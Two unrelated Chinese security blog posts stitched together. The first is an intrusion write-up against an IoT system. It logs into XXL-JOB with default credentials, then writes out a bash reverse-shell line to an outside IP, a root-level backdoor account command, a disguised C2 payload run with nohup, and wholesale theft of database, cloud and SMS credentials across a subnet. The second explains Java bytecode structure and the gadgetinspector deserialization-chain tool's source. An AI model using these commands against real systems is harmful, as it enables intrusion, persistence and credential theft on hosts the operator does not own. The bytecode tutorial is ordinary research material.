从登录封锁到打穿内网沦陷整个C段
外网打点
OK!又是经典开局,一个登录框,看样子是某个IOT管理系统
于是先去搜索了几个关键字看看有无Nday,无果,没事不慌,没有Nday就活不了了嘛?
于是直接硬干,试试弱口令,前端逻辑绕过,SQL万能密码……
结果发现泥煤的,还真是活不了
尝试登录时,直接爆系统错误,后端请求验证码的接口压根就异常了,直接不让你登录,就算得到了账号密码也登录不上去,因为验证码这一步的登录逻辑缺失,猜测应该是后台存在什么漏洞,或者前台是弱口令,系统被攻击了,让开发去修漏洞,开发为了省事或者不知道咋修,就直接把验证码禁用了,不让你登录,以前遇到几个若依的系统也是这样……
那我们就没办法了吗?
直接来一套API接口,HTML源码,JS源码审计一条龙测试,好吧还真没办法,仍旧无果
都整不出来咋搞呢……
这时候我一般会去扫目录,扫端口,往往可能会打开新的攻击面,当然这也是老生常谈了
于是经典用ffuf扫一扫,除了302跳转到本网页之外没有任何东西……不急不急,再试试一定有突破口的(想骂人了)
无奈之下,本来都打算快放弃了,临走之前想着再端口扫描下吧?唉!还真扫出了一个9090端口,这不就柳暗花明了嘛
点开一看,wc?这不是XXLJOB吗,这个可以尝试打一下的,有好几个Nday呢
有如下几个Nay,可以RCE的
xxl-job api未授权Hessian2反序列化 <=2.0.2
XXL-JOB executor未授权访问漏洞 <=2.2.0
xxl-job <=2.3.1 存在 SSRF 漏洞
于是我们先看看版本:前台右键搜索源码里的关键字:"admin_version"
很遗憾,版本是2.4.1的高版本,不能直接打这几个RCE的day
但是都到这里了,我们就这么算了吗?肯定不是呀
熟悉的师傅都知道,xxl-job默认密码是admin / 123456 那我们直接尝试一手默认口令,如果真的进了后台也是可以直接RCE的
也是老天眷顾,狗运来了,直接默认口令进去了!
GetShell
那么话不多说直接后台新建任务,可以直接执行系统命令反弹shell:
新增执行任务
运行模式选shell,cron表达式自行决定,例如:0 0 0 * * ?,每天午夜 0 点 0 分 0 秒(00:00:00)触发任务
保存,来到IDE
可以直接写一个反弹shell的命令
#!/bin/bash
/bin/bash -i >& /dev/tcp/11.111.11.111/1234 0>&1
vps监听1234端口
nc -lvvp 1234
成功回弹shell
哟西,还是root权限,提权都省了,巴适
权限维持
(当时没考虑太多,就只简单做了一下权限维持)
添加一个后门用户root权限,以免被发现xxl-job权限掉了
useradd -p `openssl passwd -1 -salt 'salt' password` system -o -u 0 -g root -G root -s /bin/bash -d /system
用新建的后门用户连接一下ssh,连接时可以挂个代理
连接成功
看看性能配置
wc,还是32G的运存,512G的硬盘
上线C2
权限维持之后呢,上线C2建立节点,便于后渗透操作
使用vshell 建立反向TCP监听
生成linux_amd64载荷
我喜欢重命名为一个看似正常的文件 bak
赋予执行权限
chmod +x bak
后台一直执行
nohup ./bak > nohup.out 2>&1 &
耐心等待一下上线,成功上线!
代理
建立C2节点之后呢,穿一个socks5代理出来
本机使用proxifier配置好全局代理规则,就可以直接请求对应的内网地址了
信息收集
上传netspy扫一下网段存活,可以看到有大量网段存活,先记录一下待会拿去fscan扫一扫
再看看有没有docker容器运行
docker ps
docker开了许多服务
其中mysql就是docker启动的,我们可以直接进入到mysql容器里执行mysql命令,从而就直接获取到mysql权限
# 进入容器内的 MySQL Shell
docker exec -it mysql_container_name mysql -uroot -p
不过如果觉得这样不够直观我们还可以去翻找mysql数据库配置文件,既然是docker启动的mysql,那么数据库密码在docker-compose.yml配置文件里
成功找到用户名mysql,密码Zxxxxxxx
直接拿去密码复用一下,用mysql的密码,登录root账号
数据库
也是成功登录root,mysql root权限+1
一共有16个数据库,其中还有nacos
上传免杀fscan,直接扫一波C段,都是存活的
东西还不少
获取权限
Nacos权限
nacos未授权访问,查看用户,看来已经有前人的足迹了
未授权直接创建一个用户 nacos3,进去翻垃圾吃
10条配置信息
mysql权限
发现mysql数据库用户名和密码,mysql数据库root权限+1
redis权限
redis权限+1
es权限
es权限+1
ftp权限
ftp+1
三方短信权限
第三方短信平台权限+1
tdengine权限
tdengine权限
kafka权限
kafka权限+1
百度谷歌地图权限
百度地图AK+1,谷歌Key+1
IOT设备权限
API密钥AK/SK,IOT设备权限+1
OSS权限
OSS AK/SK权限+1
OSS AK/SK权限+1
OSS AK/SK权限+1
阿里云短信权限
阿里云短信平台 AK/SK
RocketMQ权限
RocketMQ未授权+1
KafkaServer权限
KafkaServer权限
zk权限
zk权限
Memcached权限
Memcached未授权
使用本地搭建的MemAdmin读取数据,是一些邮箱和服务器地址而已
横向移动
让我有点小激动的是,fscan的扫描结果显示,整个C段下居然几乎每个主机都部署了XXL-JOB系统,而且经过我的尝试,都是清一色的弱口令!admin / 123456。真的是纯狗运【双手合十】【双手合十】【双手合十】
(每个主机都部署了XXL-JOB的fscan扫描截图忘记截图了)
简单列举几个
61主机
31主机
209主机
反弹shell,都是root权限
凭借运气+fscan,脚本小子获取到了几乎整个C段主机的权限,当然还有大量的各种web系统的Nday没有去看了,太多了
其实是因为代理不稳定,或者是网络问题。代理特别的慢,导致内网遨游很不顺畅(这也是我为什么要上传工具到受害主机上去,而不在本地通过代理去扫描的原因),特别难受,半天加载不出来,于是就没有继续利用了……
小结
到此,全篇结束。本篇没有什么很高级的红队技巧,全凭狗运,因为笔者红队技术菜,行文以及渗透时有许多地方考虑不周,欢迎各位大佬在评论区留言指教,晚辈感激不尽。但是当成一个新手师傅入门的渗透案例看看我觉得还行,于是就发了出来,下次再见师傅们!
从字节码开始到ASM的gadgetinspector源码解析
Intro
目前在CTF比赛中,对于Java反序列化基本上靠codeql、tabby等工具分析利用链,tabby基于字节码的特性会更准确一些。而gadgetinspector作为一个有些年头的基于ASM对字节码进行分析的自动化反序列化链挖掘工具,虽然在实际场景使用中用到的不算很多,但是经过一些功能上的补足和二开后也提高了一部分的准确率。我们主要通过二开后的gadgetinspector来学习一下作者是如何通过ASM来对字节码进行处理并跟踪污点流进行分析。在分析gadgetInspector之前,我们要先对字节码的相关结构有一些了解,所以我们可以按照字节码的固定架构使用十六进制编辑器查看一下字节码中到底存
二开后的GadgetInspector:https://github.com/threedr3am/gadgetinspector
字节码分析
我们以如下类进行分析:
package com.y1zh3e7.Test;
public class ClassTest {
public static void main(String[] args) {
String sayHello = "Hello World!";
}
}
编译后class文件扔到hex编辑器里查看十六进制方便分析:
CA FE BA BE 00 00 00 34 00 18 0A 00 04 00 14 08 00 15 07 00 16 07 00 17 01 00 06 3C 69 6E 69 74 3E 01 00 03 28 29 56 01 00 04 43 6F 64 65 01 00 0F 4C 69 6E 65 4E 75 6D 62 65 72 54 61 62 6C 65 01 00 12 4C 6F 63 61 6C 56 61 72 69 61 62 6C 65 54 61 62 6C 65 01 00 04 74 68 69 73 01 00 1C 4C 63 6F 6D 2F
class文件结构如下
0x01 魔术头 Magic Number-4Byte
class文件的魔术头为四字节并且值固定,可以看到为如下内容,这个十六进制表达还是挺有意思的
CA FE BA BE
0x02 版本号 Version-2+2Byte
十六进制对应内容为
00 00 00 34
前面的0000为次版本号,后面的0034为主版本号,0x0034对应十进制为52,对应版本为jdk1.8,对应的我IDEA中的jdk版本也是1.8
0x03 常量池 Constant Pool-2+nByte
常量池的2+n指的是两字节的常量数量,加上nByte的常量内容,常量池存储如下内容:
接下来我们继续分析十六进制并以此说明:
首先的两个字节代表常量数量,0x0018转换为十进制为24。这里需要注意的是,常量池的常量索引并不是从0开始而是从1开始,因此24表示常量池中共有23个常量,索引以此为1-23,并且在.class文件中,只有常量池的下标是从0开始,后面的接口、属性、方法等下表依然都是从0开始计数:
00 18
CONSTANT-1
根据上面的表格,我们可以发现不论是何种类型的常量,都是以u1(1字节)的tag位作为起始,因此我们向下读取一字节,为第一个常量的tag,为0x0A:
0A
0x0A对应十进制10,我们在表格中寻找值为10的索引,可以找到该常量类型为CONSTANT_Methodref_info,并且接下来还分别有两个u2的index,我们继续向下读取两个字节,则对应表格中指向声明方法的类描述符的索引项,这些东西的作用我们到后面就会知道了,先继续往下看
00 04
继续向下读取两个字节,对应指向名称及类型描述符索引项,值为20
00 14
constant#1:
0x0a:Methodref_info
0x00 04:Class_info索引项#4
0x00 14:NameAndType索引项#20
CONSTANT-2
向下读取1B,即为第二个常量的TAG位,值为08,对应表格中CONSTANT_Fieldref_info,依旧是两个u2的index
constant#2:
0x08:String_info
0x00 15::指向字符串字面量#21
CONSTANT-3
0x07:Class_info
0x00 16:全局限定名常量项索引#22
CONSTANT-4
0x07:Class_info
0x00 17:全局限定名常量项索引#23
CONSTANT-5
0x01:Utf8_info
0x00 06:字符串长度为6
0x3C 69 6E 69 74 3E:字符串<init>
CONSTANT-6
0x01:Utf8-info
0x00 03:字符串长度为3
0x28 29 56:字符串()V
CONSTANT-7
0x01:Utf8-info
0x00 04:字符串长度为4
0x43 6F 64 65:字符串Code
CONSTANT-8
0x01:Utf8-info
0x00 0F:字符串长度为15
0x4C 69 6E 65 4E 75 6D 62 65 72 54 61 62 6C 65:字符串LineNumberTable
CONSTANT-9
0x01:Utf8-info
0x00 12:字符串长度为18
0x4C 6F 63 61 6C 56 61 72 69 61 62 6C 65 54 61 62 6C 65:字符串LocalVariableTable
CONSTANT-10
0x01:Utf8-info
0x00 04:字符串长度为4
0x74 68 69 73:字符串this
CONSTANT-11
0x01:Utf8-info
0x00 1C:字符串长度为28
0x4C 63 6F 6D 2F 79 31 7A 68 33 65 37 2F 54 65 73 74 2F 43 6C 61 73 73 54 65 73 74 3B:字符串Lcom/y1zh3e7/Test/ClassTest;
CONSTANT-12
0x01:Utf8-info
0x00 04:字符串长度为4
0x6D 61 69 6E:字符串main
CONSTANT-13
0x01:Utf8-info
0x00 16:字符串长度为22
0x28 5B 4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B 29 56:字符串([Ljava/lang/String;)V
CONSTANT-14
0x01:Utf8-info
0x00 04:字符串长度为4
0x61 72 67 73:字符串args
CONSTANT-15
0x01:Utf8-info
0x00 13:字符串长度为19
0x5B 4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B:字符串[Ljava/lang/String;
CONSTANT-16
0x01:Utf8-info
0x00 08:字符串长度为8
0x73 61 79 48 65 6C 6C 6F:字符串sayHello
CONSTANT-17
0x01:Utf8-info
0x00 08:字符串长度为18
0x4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B:字符串Ljava/lang/String;
CONSTANT-18
0x01:Utf8-info
0x00 0A:字符串长度为10
0x53 6F 75 72 63 65 46 69 6C 65:字符串SourceFile
CONSTANT-19
0x01:Utf8-info
0x00 0A:字符串长度为14
0x43 6C 61 73 73 54 65 73 74 2E 6A 61 76 61:字符串ClassTest.java
CONSTANT-20
0x0C:NameAndType_info
0x00 05:字段或方法名常量项索引#5
0x00 06:字段或方法描述符常量索引#6
CONSTANT-21
0x01:Utf8-info
0x00 0C:字符串长度为12
0x48 65 6C 6C 6F 20 57 6F 72 6C 64 21:字符串Hello World!
CONSTANT-22
0x01:Utf8-info
0x00 1A:字符串长度为26
0x63 6F 6D 2F 79 31 7A 68 33 65 37 2F 54 65 73 74 2F 43 6C 61 73 73 54 65 73 74:字符串com/y1zh3e7/Test/ClassTest
CONSTANT-23
0x01:Utf8-info
0x00 10:字符串长度为16
0x6A 61 76 61 2F 6C 61 6E 67 2F 4F 62 6A 65 63 74:字符串java/lang/Object
0x04 访问标志位 Access Flags-2Byte
访问标志位包括一个class文件的属性(如是类还是接口,是否被定义成public,是否是abstract,是否是final)
我们向下读取两个Byte0x0021,代表的是0x0020和0x0001的集合,意思是该类为public,并且继承object(0x06父类索引)
0x05 类索引-2Byte
类索引可以确定类的全局限定名称,我们读取两个字节为0x00 03,对应常量池第三个常量CONSTANT-3,可以发现CONSTANT-3:0x00 16:全局限定名常量项索引#22,所以继续去CONSTANT-22查找对应常量,得到全局限定类名com/y1zh3e7/Test/ClassTest
0x06 父类索引-2Byte
0X00 04,对应CONSTANT-4,0x00 17:全局限定名常量项索引#23,对应java/lang/Object
0X07 接口索引-2+n
2+n依旧指两个字节代表接口数量,n代表接口表,我们向下读取两个字节0X00 00,即接口数量为0,自然也没有n了
0x08 字段表集合-2+nByte
字段表中包含了类中声明的变量,以及实例化后的变量,但是不包括方法内声明的局部变量,因此继续向下读取两个字节,可以发现也是0x00 00,因为我们的变量是定义在psvm中,如果将代码修改如下:
public class ClassTest {
String sayHello = "Hello World!";
}
那么此处的2byte则为0x00 01
0x09 方法-2+nByte
继续读取2Byte,0X00 02,说明我们的类中有两个方法,但是代码中我们明明只有一个方法psvm,其实是因为除了接口和抽象类,在javac时会自动生成一个无参构造,我们可以反编译看到他,也可以javap后看到这个构造器:
{
public com.y1zh3e7.Test.ClassTest();
descriptor: ()V
flags: ACC_PUBLIC
Code:
stack=1, locals=1, args_size=1
0: aload_0
1: invokespecial #1 // Method java/lang/Object."<init>":()V
4: return
LineNumberTable:
line 3: 0
LocalVariableTable:
Start Length Slot Name Signature
0 5 0 this Lcom/y1zh3e7/Test/ClassTest;
public static void main(java.lang.String[]);
descriptor: ([Ljava/lang/String;)V
flags: ACC_PUBLIC, ACC_STATIC
Code:
stack=1, locals=2, args_size=1
0: ldc #2 // String Hello World!
2: astore_1
3: return
LineNumberTable:
line 5: 0
line 6: 3
LocalVariableTable:
Start Length Slot Name Signature
0 4 0 args [Ljava/lang/String;
3 1 1 sayHello Ljava/lang/String;
}
我们继续向下读取两个方法,方法表结构如下:
method_info {
u2 access_flags;
u2 name_index;
u2 descriptor_index;
u2 attributes_count;
attribute_info attributes[attributes_count];
}
构造方法解析
我们按照格式来读取第一个方法:0x00 01,访问标志位,代表public方法,给出以下访问标志控制符掩码解析:
十六进制值 名称 说明
0x0001 ACC_PUBLIC 方法为 public 权限
0x0002 ACC_PRIVATE 方法为 private 权限
0x0004 ACC_PROTECTED 方法为 protected 权限
0x0008 ACC_STATIC 方法为 static 静态方法
0x0010 ACC_FINAL 方法为 final(不可被覆盖)
0x0020 ACC_SYNCHRONIZED 方法为 synchronized(同步方法)
0x0040 ACC_BRIDGE 方法是由编译器生成的桥接方法(用于泛型类型擦除)
0x0080 ACC_VARARGS 方法接受可变参数(如 String... args)
0x0100 ACC_NATIVE 方法为 native(由本地代码实现)
0x0400 ACC_ABSTRACT 方法为 abstract(抽象方法,无实现)
0x0800 ACC_STRICT 方法为 strictfp(严格浮点模式)
0x1000 ACC_SYNTHETIC 方法是由编译器生成的(如默认构造方法、枚举类的 values() 方法等)
控制符可以组合使用,如
public static 方法:0x0001 (ACC_PUBLIC) | 0x0008 (ACC_STATIC) = 0x0009
private final synchronized 方法:0x0002 | 0x0010 | 0x0020 = 0x0032
其中某些标志不能同时存在(如 public、private、protected 只能三选一)。
0x00 05,name_index代表方法索引名,我们去CONSTANT-5进行查找为<init>,这是字节码中对构造方法的专用描述。
0x00 06,方法描述符索引。查找CONSTANT-6,为()V。方法描述符的语法是 (参数类型)返回类型,其中 V 表示 void(即无返回值)。():表示方法没有参数。V:表示方法的返回类型为 void。
为什么构造方法的返回类型是 void?虽然构造方法在 Java 语法中没有显式返回值,但在字节码层面,构造方法的返回类型被标记为 void。实际上,构造方法隐式返回构造的实例对象(this),但这一过程由 JVM 自动处理,不需要在描述符中体现。
0x00 01,attributes_count,这里引入属性表的概念。属性表可以描述方法的专有信息,这里则代表了该方法的属性表数量为一个。
通用属性表结构如下:
attribute_info { u2 attribute_name_index; u4 attribute_length; u1 info[attribute_length];}
根据通用属性表结构,我们读取一个u2,0x00 07到CONSTANT-7中查找,发现是Code。
在 JVM 的 .class 文件中,Code、LineNumberTable、LocalVariableTable 和 SourceFile 是类文件属性的重要组成部分,分别用于描述方法的行为、调试信息、局部变量与源码的映射关系,以及源码文件的元数据。
Code属性:
Code 属性是方法表(method_info)中的核心属性,作用如下:
存储字节码:包含方法的具体指令(如 aload_0, invokespecial 等)。
定义执行环境:通过 max_stack 和 max_locals 告诉 JVM 如何分配栈帧内存。
异常处理:通过 exception_table 定义 try-catch 块的范围和异常类型。
关联调试信息:通过子属性(如 LineNumberTable)将字节码与源码关联。
Code属性结构如下:
Code_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 max_stack;
u2 max_locals;
u4 code_length;
u1 code[code_length];
u2 exception_table_length;
{ u2 start_pc;
u2 end_pc;
u2 handler_pc;
u2 catch_type;
} exception_table[exception_table_length];
u2 attributes_count;
attribute_info attributes[attributes_count];
}
继续读取一个u4,attribute_length,0x0000002F代表接下来的47个字节为Code属性的指令字节码。
读取一个u2,0x00 01,max_stack,代表操作数栈最大深度1,一会我们在分析字节码指令时就知道这是什么意思了。
0X00 01,max_locals,代表方法的局部变量表大小为1,局部变量为this,因为所有实例方法(非静态方法)和构造方法的第一个局部变量槽位(索引 0)都存储了当前对象的引用(即 this)。这是 JVM 的隐式规则,无需在代码中显式声明,因此在psvm这个静态方法中就不会包含this了。此外如果该构造方法为有参构造,那么max_locals数量会+n(参数列表的参数数量)
0x00 00 00 05,code_length为指令长度,也就是说接下来的五个字节为指令。
2A B7 00 01 B1,我们分别来分析这几条指令的作用。2A对应指令aload_0,用于加载局部方法表中的参数到操作数栈中,因此这一步会将this加载到操作数栈上。B7 对应指令invokespecial ,00 01对应CONSTANT-1,即调用父类构造方法。B1对应指令return,方法返回。
0x00 00,exception_table_length,代表异常表为空。
0x00 02,attributes_count,代表该Code属性中还包含了两个子属性。
0x00 08,对应CONSTANT-8,LineNumberTable,则说明该子属性为一个LineNumberTable。
LineNumberTable 属性:
Code 属性的子属性,记录 字节码偏移量 与 源码行号 的映射关系,作用如下:
调试支持:在 IDE 或异常堆栈中显示源码行号(如 Exception in thread "main" java.lang.NullPointerException at Test.java:12)。
反编译辅助:帮助工具(如 javap)生成更易读的反编译结果。
优化限制:若省略此属性,JIT 编译器可能无法进行某些优化(如基于行号的 Profiling)。
LineNumberTable属性结构如下:
LineNumberTable_attribute { u2 attribute_name_index; u4 attribute_length; u2 line_number_table_length; { u2 start_pc; u2 line_number; } line_number_table[line_number_table_length];}
0x00 00 00 06,attribute_length,代表接下来的六字节为属性。
00 01,line_number_table_length为1,代表了下面的line_number_table长度为1。
每个line_number_table包含两个字段,0x00 00对应start_pc,0x00 03对应line_number,这两个字段负责将字节码偏移量与源码行数进行映射,start_pc对应字节码偏移量,line_number对应源码行数,因此0003意思是将第0行开始的字节码指令全部与第三行源码进行对应。如果line_number_table长度不为1,还会有多个start_pc来负责映射字节码指令和源码的关系。比如如果还有一组start_pc=3,line_number=4,那么两组映射关系意思是字节码偏移量0-2对应源码第三行,字节码偏移量3及之后的指令对应源码第四行。
我们继续向下读取第Code的第二个子属性,0x00 09,对应CONSTANT-9,LocalVariableTable。
LocalVariableTable属性:
Code 属性的子属性,记录 局部变量名、类型 及其在局部变量表中的 槽位 和作用域,作用如下:
调试支持:在 IDE 中显示局部变量名和值(如调试时查看 sayHello 变量的内容)。
反射支持:通过 Method.getParameters() 获取参数名(需编译时启用 -parameters 选项)。
反编译辅助:帮助反编译器还原变量名(否则变量名会变成 var1, var2)。
LocalVariableTable属性结构如下:
LocalVariableTable_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 local_variable_table_length;
{ u2 start_pc;
u2 length;
u2 name_index;
u2 descriptor_index;
u2 index;
} local_variable_table[local_variable_table_length];
}
0x00 0000 0C,attribute_length,代表接下来12字节为属性长度。
0x00 01,代表一个局部变量条目,因此下面的local_variable_table[1]中即为描述局部变量this的相关信息。0x00 00,start_pc,代表this的作用域从字节码偏移量0开始,作用域覆盖0x00 05length,共五个字节。
0x00 0A,name_index,指向CONSTANT-10,局部变量名为this。
0x00 0B,类的全局限定名,指向CONSTANT-11,Lcom/y1zh3e7/Test/ClassTest
0x00 00,index,指该局部变量存储在局部变量表的槽位 0(实例方法的 this 固定占用槽位 0)
main方法解析
0x00 09:访问标志,0x01和0x08的集合,即public static。
0x00 0C:name_index,指向CONSTANT-12,类名main,
0x00 0D:descriptor_index,指向CONSTANT-13,([Ljava/lang/String;)V,方法接收参数为String,返回类型为viod。
0x00 01:attributes_count,属性数量为1。
继续解析属性:
字段十六进制值十进制值/说明attribute_name_index00 07指向常量池第 7 项("Code")attribute_length00 00 00 3C属性总长度:60 字节max_stack00 01操作数栈最大深度:1max_locals00 02局部变量表大小:2(args 和 sayHello)code_length00 00 00 04字节码长度:4 字节字节码12 02 4C B1指令解析:12 02ldc #2(加载常量 "Hello World!")4Castore_1(存储到局部变量 1)B1return(方法返回)exception_table_length
子属性 1:LineNumberTable
字段十六进制值说明attribute_name_index00 08常量池第 8 项("LineNumberTable")attribute_length00 00 00 0A长度 10 字节line_number_table_length00 022 个行号条目条目 1:start_pc00 00字节码偏移 0 → 源码第 5 行条目 1:line_number00 05条目 2:start_pc00 03字节码偏移 3 → 源码第 6 行条目 2:line_number00 06
子属性 2:LocalVariableTable
字段十六进制值说明attribute_name_index00 09常量池第 9 项("LocalVariableTable")attribute_length00 00 00 16长度 22 字节local_variable_table_length00 022 个局部变量条目条目 1:start_pc00 00变量 args 作用域起始偏移 0length00 04作用域长度 4 字节name_index00 0E常量池第 14 项(变量名 args)descriptor_index00 0F常量池第 15 项(类型 [Ljava/lang/String;)index00 00局部变量槽位
0x10 属性Attribute-2+nByte
0x00 01:属性数量1
0x0012:属性名称,CONSTANT-18,SourceFile。
SourceFile属性:
类文件的顶级属性,记录 源码文件名,作用如下:
调试支持:在异常堆栈中显示源码文件名(如 Test.java)。
代码溯源:帮助开发者快速定位源码文件。
可读性:反编译时显示原始文件名,而非匿名类名。
SourceFile文件结构如下:
SourceFile_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 sourcefile_index;
}
0x00 00 00 02,attribute_length,属性长度2.
0x00 13,sourcefile_index,指向CONSTANT-19,为ClassTest.java。
gadgetInspector分析
0x01 Intro
工具基于ASM技术来对控制字节码,从而达到对传入jar及war包的classpath下的类进行读取,并依次记录类信息、类方法信息、调用关系信息。最后基于以上收集的信息来进行反序列化链的挖掘,分别对应如下几个类:
GadgetInspector:main方法,程序的入口,做一些配置以及数据的准备工作
MethodDiscovery:类、方法数据以及父子类、超类关系数据的搜索
PassthroughDiscovery:分析参数能影响到返回值的方法,并收集存储
CallGraphDiscovery:记录调用者caller方法和被调用者target方法的参数关联
SourceDiscovery:入口方法的搜索,只有具备某种特征的入口才会被标记收集
GadgetChainDiscovery:整合以上数据,并通过判断调用链的最末端slink特征,从而判断出可利用的gadget chain
0x02 主入口-GadgetInspetcor
该类为整个工具的入口类,基本上是对于相关配置做出初始化处理,静态代码块中创建准备写入相关结果的文件。main中首先验证是否存在参数,若为空退出。工具在挖掘时需要我们指定不同的gadget-chain,如jdk原生反序列化、jackson等,以及指定classpath的路径。
接下来会对日志进行配置,之后是对历史dat文件(上面提到的类、方法等相关数据的本地化存储)的管理,以及反序列化链类型的指定。我们主要看这一部分是如何指定反序列化链类型的:
else if (arg.equals("--config")) {
//--config参数指定fuzz类型
config = ConfigRepository.getConfig(args[++argIndex]);
if (config == null) {
throw new IllegalArgumentException("Invalid config name: " + args[argIndex]);
}
跟进到getConfig方法中,并且也可以看到所有的gadget-chain是通过不同的Config来实现的,并且都实现了GIConfig接口:
public interface GIConfig {
String getName();
SerializableDecider getSerializableDecider(Map<MethodReference.Handle, MethodReference> methodMap, InheritanceMap inheritanceMap);
ImplementationFinder getImplementationFinder(
Map<Handle, MethodReference> methodMap,
Map<Handle, Set<Handle>> methodImplMap,
InheritanceMap inheritanceMap,
Map<ClassReference.Handle, Set<Handle>> methodsByClass);
SourceDiscovery getSourceDiscovery();
SlinkDiscovery getSlinkDiscovery();
}
我们以Jackson的实现来看,这些被实现的方法都会在后面用到,他们都是用来对指定gadget-chain进行区分的方法,不同的gadget-chain的特征不同,因此我们可以通过这些方法来确认对应的chain。
package gadgetinspector.config;
import gadgetinspector.ImplementationFinder;
import gadgetinspector.SerializableDecider;
import gadgetinspector.SlinkDiscovery;
import gadgetinspector.SourceDiscovery;
import gadgetinspector.data.ClassReference;
import gadgetinspector.data.InheritanceMap;
import gadgetinspector.data.MethodReference;
import gadgetinspector.data.MethodReference.Handle;
import gadgetinspector.jackson.JacksonImplementationFinder;
import gadgetinspector.jackson.JacksonSerializableDecider;
import gadgetinspector.jackson.JacksonSourceDiscovery;
import java.util.Map;
import java.util.Set;
public class JacksonDeserializationConfig implements GIConfig {
@Override
public String getName() {
return "jackson";
}
@Override
public SerializableDecider getSerializableDecider(Map<MethodReference.Handle, MethodReference> methodMap, InheritanceMap inheritanceMap) {
return new JacksonSerializableDecider(methodMap);
}
@Override
public ImplementationFinder getImplementationFinder(
Map<Handle, MethodReference> methodMap,
Map<Handle, Set<Handle>> methodImplMap,
InheritanceMap inheritanceMap,
Map<ClassReference.Handle, Set<Handle>> methodsByClass) {
return new JacksonImplementationFinder(getSerializableDecider(methodMap, inheritanceMap));
}
@Override
public SourceDiscovery getSourceDiscovery() {
return new JacksonSourceDiscovery();
}
@Override
public SlinkDiscovery getSlinkDiscovery() {
return null;
}
}
跟进JacksonSerializableDecider,两个map中记录的是可以通过Jackson决策的类和方法:
//类是否通过决策的缓存集合
private final Map<ClassReference.Handle, Boolean> cache = new HashMap<>();
//类名-方法集合 映射集合
private final Map<ClassReference.Handle, Set<MethodReference.Handle>> methodsByClassMap;
具体的决策判断逻辑在apply中,在后面的分析中我们也可以看到会调用apply方法来判断类和方法是否通过决策。以jackson的apply来举例,由于jackson的json反序列化是需要以类的无参构造为起始,在java中如果没有显式声明无参构造器,但是显式声明了一个有参构造,那么该类是没有无参构造的,因此代表着该类不可进行jackson反序列化。
@Override
public Boolean apply(ClassReference.Handle handle) {
if (isNoGadgetClass(handle)) {
return false;
}
Boolean cached = cache.get(handle);
if (cached != null) {
return cached;
}
Set<MethodReference.Handle> classMethods = methodsByClassMap.get(handle);
if (classMethods != null) {
for (MethodReference.Handle method : classMethods) {
//该类,只要有无参构造方法,就通过决策
if (method.getName().equals("<init>") && method.getDesc().equals("()V")) {
cache.put(handle, Boolean.TRUE);
return Boolean.TRUE;
}
}
}
cache.put(handle, Boolean.FALSE);
return Boolean.FALSE;
}
接下来回到Config中,继续看InplementationFinder,在决策时由于Java的多态性,并且gadgetinspector无法在要被检测的jar运行时进行判断,因此当调用到某一接口的方法时,需要查找接口所有的实现类中的该方法,并将这些方法组成实际的调用链去进行污点分析。这些方法是否可进行当前指定的gadget-chain反序列化,还是需要通过apply方法来进行判断:
public class JacksonImplementationFinder implements ImplementationFinder {
private final SerializableDecider serializableDecider;
public JacksonImplementationFinder(SerializableDecider serializableDecider) {
this.serializableDecider = serializableDecider;
}
@Override
public Set<MethodReference.Handle> getImplementations(MethodReference.Handle target) {
Set<MethodReference.Handle> allImpls = new HashSet<>();
// For jackson search, we don't get to specify the class; it uses reflection to instantiate the
// class itself. So just add the target method if the target class is serializable.
if (Boolean.TRUE.equals(serializableDecider.apply(target.getClassReference()))) {
allImpls.add(target);
}
return allImpls;
}
}
继续看JacksonSourceDiscovery,内部只有一个discover方法,这个方法的作用就是帮我们找到可进行Jackson反序列化的入口方法,对于jackson反序列化来说,会以无参构造为入口,并依次执行setter以及getter。因此discover会查找出通过了apply决策后的类的无参构造(()V代表无参,返回值为viod),以及getter和setter。
@Override
public void discover(Map<ClassReference.Handle, ClassReference> classMap,
Map<MethodReference.Handle, MethodReference> methodMap,
InheritanceMap inheritanceMap, Map<MethodReference.Handle, Set<GraphCall>> graphCallMap) {
final JacksonSerializableDecider serializableDecider = new JacksonSerializableDecider(methodMap);
for (MethodReference.Handle method : methodMap.keySet()) {
if (skipList.contains(method.getClassReference().getName())) {
continue;
}
if (serializableDecider.apply(method.getClassReference())) {
if (method.getName().equals("<init>") && method.getDesc().equals("()V")) {
addDiscoveredSource(new Source(method, 0));
}
if (method.getName().startsWith("get") && method.getDesc().startsWith("()")) {
addDiscoveredSource(new Source(method, 0));
}
if (method.getName().startsWith("set") && method.getDesc().matches("\\(L[^;]*;\\)V")) {
addDiscoveredSource(new Source(method, 0));
}
}
继续向下看GadgetInspector,进入到initJarData方法中,通过for循环读取最后面的参数,从而指定多个jar或war包,通过URLClassLoader,根据绝对路径将这些jar或war包进行加载,并通过ClassResourceEnumerator将jar或war包中的class进行加载:
ClassLoader classLoader = initJarData(args, boot, argIndex, haveNewJar, pathList); for (int i = 0; i < args.length - argIndex; i++) {
String pathStr = args[argIndex + i];
if (!pathStr.endsWith(".jar")) {
//todo 主要用于大批量的挖掘链
//非.jar结尾,即目录,需要遍历目录找出所有jar文件
File file = Paths.get(pathStr).toFile();
if (file == null || !file.exists())
continue;
Files.walkFileTree(file.toPath(), new SimpleFileVisitor<Path>() {
@Override
public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) {
if (!file.getFileName().toString().endsWith(".jar"))
return FileVisitResult.CONTINUE;
File readFile = file.toFile();
Path path = Paths.get(readFile.getAbsolutePath());
if (Files.exists(path)) {
if (ConfigHelper.history) {
if (!scanJarHistory.contains(path.getFileName().toString())) {
if (jarCount.incrementAndGet() <= ConfigHelper.maxJarCount) {
pathList.add(path);
}
}
} else {
if (jarCount.incrementAndGet() <= ConfigHelper.maxJarCount) {
pathList.add(path);
}
}
}
return FileVisitResult.CONTINUE;
}
});
continue;
}
Path path = Paths.get(pathStr).toAbsolutePath();
if (!Files.exists(path)) {
throw new IllegalArgumentException("Invalid jar path: " + path);
}
pathList.add(path);
//类枚举加载器,具有两个方法
//getRuntimeClasses获取rt.jar的所有class
//getAllClasses获取rt.jar以及classLoader加载的class
final ClassResourceEnumerator classResourceEnumerator = new ClassResourceEnumerator(
classLoader);
接下来进入beginDiscovery方法中,接下来我们开始分析具体的挖掘逻辑。
0x03 类、方法、继承关系数据收集-MethodDiscovery
